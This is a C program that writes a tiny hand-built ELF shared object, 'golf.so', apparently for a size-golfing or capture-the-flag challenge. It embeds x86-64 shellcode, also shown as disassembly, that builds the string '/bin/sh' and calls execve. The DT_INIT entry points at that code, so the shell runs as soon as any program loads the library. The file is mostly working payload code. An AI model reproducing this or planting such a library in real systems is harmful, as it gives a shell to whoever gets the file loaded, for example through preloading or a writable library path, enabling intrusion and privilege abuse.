#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <elf.h>

#if 0
401000:       31 c0                   xor    eax,eax
401002:       b0 3b                   mov    al,0x3b
401004:       48 bf d1 9d 96 91 d0    movabs rdi,0xff978cd091969dd1
40100b:       8c 97 ff
40100e:       48 f7 df                neg    rdi
401011:       57                      push   rdi
401012:       48 89 e7                mov    rdi,rsp
401015:       31 d2                   xor    edx,edx
401017:       52                      push   rdx
401018:       57                      push   rdi
401019:       48 89 e6                mov    rsi,rsp
40101c:       52                      push   rdx
40101d:       48 89 e2                mov    rdx,rsp
401020:       0f 05                   syscall
#endif

int main(void)
{
	Elf64_Ehdr ehdr;
	Elf64_Phdr phdr[4];
	Elf64_Dyn dyn[8];
	Elf64_Shdr shdr[5];
	Elf64_Word hashtable[2];
	const char* dynstr = "libc.so.6";
	const uint64_t dynstr_size = 10;
	const char* strtab = ".shstrtab\0.dynamic\0.text\0.dynstr";
	const uint64_t strtab_size = 33;
	const char* shellcode = "\x31\xc0\xb0\x3b\x48\xbf\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdf\x57\x48\x89\xe7\x31\xd2\x52\x57\x48\x89\xe6\x52\x48\x89\xe2\x0f\x05";

	const uint64_t shdr_offset = sizeof(ehdr) + sizeof(phdr);
	const uint64_t dyn_offset = shdr_offset + sizeof(shdr);
	const uint64_t strtab_offset = dyn_offset + sizeof(dyn);
	const uint64_t dynstr_offset = strtab_offset + strtab_size;
	const uint64_t shellcode_offset = dynstr_offset + dynstr_size;
	const uint64_t hashtable_offset = shellcode_offset + strlen(shellcode);
	const uint64_t file_size = hashtable_offset + sizeof(hashtable);

	const uint64_t strtab_idx = 0;
	const uint64_t dynamic_idx = 10;
	const uint64_t text_idx = 19;
	const uint64_t dynstr_idx = 25;

	memset(&ehdr, 0, sizeof(ehdr));
	memset(hashtable, 0, sizeof(hashtable));

	ehdr.e_ident[EI_MAG0] = ELFMAG0;
	ehdr.e_ident[EI_MAG1] = ELFMAG1;
	ehdr.e_ident[EI_MAG2] = ELFMAG2;
	ehdr.e_ident[EI_MAG3] = ELFMAG3;
	ehdr.e_ident[EI_CLASS] = ELFCLASS64;
	ehdr.e_ident[EI_DATA] = ELFDATA2LSB;
	ehdr.e_ident[EI_VERSION] = EV_CURRENT;
	ehdr.e_ident[EI_OSABI] = ELFOSABI_SYSV;
	ehdr.e_ident[EI_ABIVERSION] = 0;

	ehdr.e_type = ET_DYN;
	ehdr.e_machine = EM_X86_64;
	ehdr.e_version = EV_CURRENT;
	ehdr.e_entry = shellcode_offset;
	ehdr.e_phoff = sizeof(Elf64_Ehdr); // PHDR offset, important!
	ehdr.e_shoff = shdr_offset;
	ehdr.e_flags = 0;
	ehdr.e_ehsize = sizeof(Elf64_Ehdr);
	ehdr.e_phentsize = sizeof(Elf64_Phdr);
	ehdr.e_phnum = 4; // code, dynamic
	ehdr.e_shentsize = sizeof(Elf64_Shdr);
	ehdr.e_shnum = 5;
	ehdr.e_shstrndx = 1;

	phdr[0].p_type = PT_LOAD;
	phdr[0].p_flags = PF_R | PF_X;
	phdr[0].p_offset = 0;
	phdr[0].p_vaddr = 0;
	phdr[0].p_paddr = 0;
	phdr[0].p_filesz = file_size;
	phdr[0].p_memsz = file_size;
	phdr[0].p_align = 0x1000;

	phdr[1].p_type = PT_LOAD;
	phdr[1].p_flags = PF_R | PF_W;
	phdr[1].p_offset = 0;
	phdr[1].p_vaddr = 0x1000;
	phdr[1].p_paddr = 0x1000;
	phdr[1].p_filesz = file_size;
	phdr[1].p_memsz = file_size;
	phdr[1].p_align = 0x1000;

	phdr[2].p_type = PT_DYNAMIC;
	phdr[2].p_flags = PF_R | PF_W;
	phdr[2].p_offset = dyn_offset;
	phdr[2].p_vaddr = 0x1000 + dyn_offset;
	phdr[2].p_paddr = 0x1000 + dyn_offset;
	phdr[2].p_filesz = sizeof(dyn);
	phdr[2].p_memsz = sizeof(dyn);
	phdr[2].p_align = 0x8;

	phdr[3].p_type = PT_GNU_STACK;
	phdr[3].p_flags = PF_R | PF_W;
	phdr[3].p_offset = 0;
	phdr[3].p_vaddr = 0;
	phdr[3].p_paddr = 0;
	phdr[3].p_filesz = 0;
	phdr[3].p_memsz = 0;
	phdr[3].p_align = 0x10;

	shdr[0].sh_name = dynamic_idx - 1;
	shdr[0].sh_type = SHT_NULL;
	shdr[0].sh_flags = 0;
	shdr[0].sh_addr = 0;
	shdr[0].sh_offset = 0;
	shdr[0].sh_size = 0;
	shdr[0].sh_link = 0;
	shdr[0].sh_info = 0;
	shdr[0].sh_addralign = 0x1000;
	shdr[0].sh_entsize = sizeof(Elf64_Shdr);

	shdr[1].sh_name = strtab_idx;
	shdr[1].sh_type = SHT_STRTAB;
	shdr[1].sh_flags = 0;
	shdr[1].sh_addr = 0x1000 + strtab_offset;
	shdr[1].sh_offset = strtab_offset;
	shdr[1].sh_size = strtab_size;
	shdr[1].sh_link = 0;
	shdr[1].sh_info = 0;
	shdr[1].sh_addralign = 0x1;
	shdr[1].sh_entsize = sizeof(Elf64_Shdr);

	shdr[2].sh_name = dynamic_idx;
	shdr[2].sh_type = SHT_DYNAMIC;
	shdr[2].sh_flags = SHF_ALLOC | SHF_WRITE;
	shdr[2].sh_addr = 0x1000 + dyn_offset;
	shdr[2].sh_offset = dyn_offset;
	shdr[2].sh_size = sizeof(dyn);
	shdr[2].sh_link = 4;
	shdr[2].sh_info = 0;
	shdr[2].sh_addralign = 0x1;
	shdr[2].sh_entsize = sizeof(Elf64_Shdr);

	shdr[3].sh_name = text_idx;
	shdr[3].sh_type = SHT_PROGBITS;
	shdr[3].sh_flags = SHF_ALLOC | SHF_EXECINSTR;
	shdr[3].sh_addr = shellcode_offset;
	shdr[3].sh_offset = shellcode_offset;
	shdr[3].sh_size = strlen(shellcode);
	shdr[3].sh_link = 0;
	shdr[3].sh_info = 0;
	shdr[3].sh_addralign = 0x1000;
	shdr[3].sh_entsize = sizeof(Elf64_Shdr);

	shdr[4].sh_name = dynstr_idx;
	shdr[4].sh_type = SHT_STRTAB;
	shdr[4].sh_flags = SHF_ALLOC | SHF_EXECINSTR;
	shdr[4].sh_addr = 0x1000 + dynstr_offset;
	shdr[4].sh_offset = dynstr_offset;
	shdr[4].sh_size = dynstr_size;
	shdr[4].sh_link = 0;
	shdr[4].sh_info = 0;
	shdr[4].sh_addralign = 0x1;
	shdr[4].sh_entsize = sizeof(Elf64_Shdr);

	dyn[0].d_tag = DT_NEEDED;
	dyn[0].d_un.d_val = 0; // libc.so.6
	dyn[1].d_tag = DT_INIT;
	dyn[1].d_un.d_val = shellcode_offset; // initializer function address
	dyn[2].d_tag = DT_HASH;
	dyn[2].d_un.d_val = hashtable_offset; // DT_HASH hashtable
	dyn[3].d_tag = DT_STRTAB;
	dyn[3].d_un.d_val = dynstr_offset; // stringtable offset
	dyn[4].d_tag = DT_SYMTAB;
	dyn[4].d_un.d_val = 0; // symbol table offset
	dyn[5].d_tag = DT_STRSZ;
	dyn[5].d_un.d_val = dynstr_size; // stringtable size
	dyn[6].d_tag = DT_SYMENT;
	dyn[6].d_un.d_val = 0; // symbol count
	dyn[7].d_tag = DT_NULL;
	dyn[7].d_un.d_val = 0;

	FILE* out = fopen("golf.so", "wb");
	fwrite(&ehdr, 1, sizeof(Elf64_Ehdr), out);
	fwrite(phdr, 4, sizeof(Elf64_Phdr), out);
	fwrite(shdr, 5, sizeof(Elf64_Shdr), out);
	fwrite(dyn, 8, sizeof(Elf64_Dyn), out);
	fwrite(strtab, 1, strtab_size, out);
	fwrite(dynstr, 1, dynstr_size, out);
	fwrite(shellcode, 1, strlen(shellcode), out);
	fwrite(hashtable, 1, sizeof(hashtable), out);
	fclose(out);

	printf("shdr:      %x\n", shdr_offset);
	printf("dyn:       %x\n", dyn_offset);
	printf("strtab:    %x\n", strtab_offset);
	printf("dynstr:    %x\n", dynstr_offset);
	printf("shellcode: %x\n", shellcode_offset);
	printf("hashtable: %x\n", hashtable_offset);
}
